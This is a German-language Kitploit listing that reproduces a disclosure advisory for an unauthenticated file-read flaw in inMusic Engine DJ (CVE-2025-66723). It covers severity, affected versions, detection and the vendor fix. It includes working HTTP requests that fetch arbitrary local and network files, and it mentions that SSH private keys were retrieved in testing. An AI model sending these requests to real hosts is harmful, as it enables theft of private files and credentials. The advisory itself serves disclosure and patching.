Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2025-66723 — CVE-2025-66723: inMusic Brands Engine DJ >=3.0.0 bis <4.3.4 legt lokale und Netzwerk-Dateien für externe Parteien offen | Kitploit
Tools/GitHubGitHub/audiopump/cve-2025-66723
SchwachstellenanalyseExploitationDatenexfiltrationInformationsbeschaffungWebsicherheitNetzwerksicherheit
GitHubaudiopump/cve-2025-66723

cve-2025-66723

CVE-2025-66723: inMusic Brands Engine DJ >=3.0.0 bis <4.3.4 legt lokale und Netzwerk-Dateien für externe Parteien offen

Repository anzeigen
5vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-66723: inMusic Brands Engine DJ >=3.0.0 bis <4.3.4 legt lokale und Netzwerkdateien für externe Parteien offen

Zusammenfassung

Die Software Engine DJ von inMusic Brands enthält einen eingebetteten HTTP-Server zur Übertragung von Medienbibliotheksdateien an verbundene Clients im Netzwerk. Die Mediendateien werden über Dateisystempfade referenziert. Engine DJ authentifiziert Clients nicht und schränkt angeforderte Dateisystempfade nicht ein. Dadurch kann ein Angreifer vertrauliche lokale oder netzwerkerreichbare Dateien von betroffenen Systemen exfiltrieren.

Ein Angreifer benötigt lediglich Netzwerkzugriff auf den betroffenen Host; keine Authentifizierung oder vorherige Interaktion ist erforderlich.

Engine DJ v4.3.4, veröffentlicht am 17. November 2025, enthält eine Abhilfe. Benutzer werden aufgefordert, so schnell wie möglich zu aktualisieren.

Schwachstellenklassifizierung

  • CWE-552: Für externe Parteien zugängliche Dateien oder Verzeichnisse
  • CWE-862: Fehlende Autorisierung

Schweregrad

CVSS v3.1 Basisschweregrad: 7,5 (Hoch)

Vektor: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Betroffene Versionen

Engine DJ >=3.0.0, <4.3.4, auf allen Plattformen (macOS, Windows).

Speziell getestete Versionen, die als betroffen/verwundbar befunden wurden, macOS und Windows:

3.0.0, 3.0.1, 3.1.0, 3.1.1, 3.2.0, 3.3.0, 3.4.0,

4.0.0, 4.0.1, 4.1.0, 4.2.0, 4.2.1, 4.3.0

Speziell getestete Versionen, die als nicht betroffen befunden wurden, macOS und Windows:

2.0.0, 2.0.1, 2.0.2, 2.1.0, 2.2.0, 2.2.1, 2.2.2, 2.3.0, 2.3.1, 2.3.2, 2.4.0,

4.3.4

Details

Normale Anfragen für Mediendateien

Beim Start bindet Engine DJ an Port :50020 auf jeder IPv4-Netzwerkschnittstelle außer localhost.

Clients sollen einen separaten gRPC-Dienst auf Port :50010 verwenden, um Zugriff anzufordern und nach Mediendateien zu suchen. Sobald der gewünschte Medienpfad gefunden wurde, stellt der Client eine HTTP-Anfrage zurück auf Port :50020:

root@kitploit:~
GET /download/%3CC%3A%2FMusic%2Ftest.flac%3E HTTP/1.1
Host: 192.0.2.1:50020
User-Agent: EngineOS/1.0 DenonDJ
Accept: */*
root@kitploit:~
HTTP/1.1 200 OK
Content-Length: 37517194
Content-Type: application/octet-stream
Keep-Alive: timeout=5, max=5

…

Hinweis: Beim Dekodieren ist der GET-Pfad oben einfach:

root@kitploit:~
/download/<C:/Music/test.flac>

Es ist nicht erforderlich, diese Zeichen bei Anfragen zu percent-codieren.

Bösartige Anfragen für beliebige lokale Dateien

Ein Angreifer kann alles anfordern, was für den Benutzer zugänglich ist, unter dem die Engine DJ-Software läuft, solange der Pfad dem Angreifer bekannt ist. In diesem Beispiel wird eine Textdatei zum Testen verwendet:

root@kitploit:~
GET /download/<C:/Users/USERNAME/test.txt> HTTP/1.1
Host: 192.0.2.1:50020
root@kitploit:~
HTTP/1.1 200 OK
Content-Length: 40
Content-Type: application/octet-stream
Keep-Alive: timeout=5, max=5

INSECURE...

From text file test.txt

Zu den während der Proof-of-Concept-Labortests abgerufenen Dateien gehörten private SSH-Schlüssel und Umgebungsdateien.

Netzwerkdateien

Angeforderte Pfade sind nicht auf lokale Dateien beschränkt. Es wurde festgestellt, dass auch Netzwerkpfade zugänglich sind, abhängig von den Berechtigungen des Hosts:

root@kitploit:~
/download/<//EXAMPLE-SERVER/C$/secret.txt>

Cross-Origin-Webanfragen

Glücklicherweise gibt es keinen Access-Control-Allow-Origin-Header oder verwandte Header in der Antwort des Servers. Daher sind Dateien nicht von normalen webbasierten Clients aus zugänglich. Bestimmte Browsererweiterungen oder Flags können verwendet werden, um die Beschränkungen für Cross-Origin-Anfragen zu lockern, sind aber unüblich.

Erkennung

IPv4-Netzwerkverkehr auf Port :50020 kann verwendet werden, um zu vermuten, dass Engine DJ in Gebrauch ist, aber es zeigt nicht an, ob ein Host verwundbar ist. Der eingebettete Server identifiziert sich nicht in seinen Antworten, und es scheint keinen messbaren Unterschied zwischen verwundbaren und nicht verwundbaren Versionen von Engine DJ zu geben. Daher scheint es extern nicht möglich zu sein, festzustellen, ob ein Host verwundbar ist, außer durch den Versuch, eine Datei anzufordern, von der bekannt ist, dass sie existiert.

Abhilfe

Unmittelbar nach der Entdeckung wurde inMusic Brands über ihre technischen Supportkanäle über die Schwachstelle informiert. Die Reaktion war professionell und schnell, und eine Abhilfe für das Problem wurde als Teil von v4.3.4 am 17. November 2025 für sowohl macOS als auch Windows veröffentlicht.

Während Mediendateien weiterhin ohne Authentifizierung/Autorisierung heruntergeladen werden können, sind die anforderbaren Pfade nun auf eine Whitelist gesetzt, sodass der Versuch, auf eine Datei außerhalb der Medienbibliothek zuzugreifen, nicht möglich ist. Benutzer erhalten eine 403-Antwort für alles, was nicht auf der Whitelist steht, selbst wenn es nicht existiert.

root@kitploit:~
GET /download/<C:/Users/USERNAME/test.txt> HTTP/1.1
Host: 192.0.2.1:50020
root@kitploit:~
HTTP/1.1 403 Forbidden
Content-Length: 17
Content-Type: text/html
Keep-Alive: timeout=5, max=5

…

Offizielle Downloads der neuesten Engine DJ-Versionen finden Sie auf der offiziellen Engine DJ-Website:

https://enginedj.com/downloads

Kontakt

Bei Fragen zu diesem Bericht wenden Sie sich bitte an den Autor:

Brad Isbell, AudioPump, Inc. [email protected]

Tool herunterladen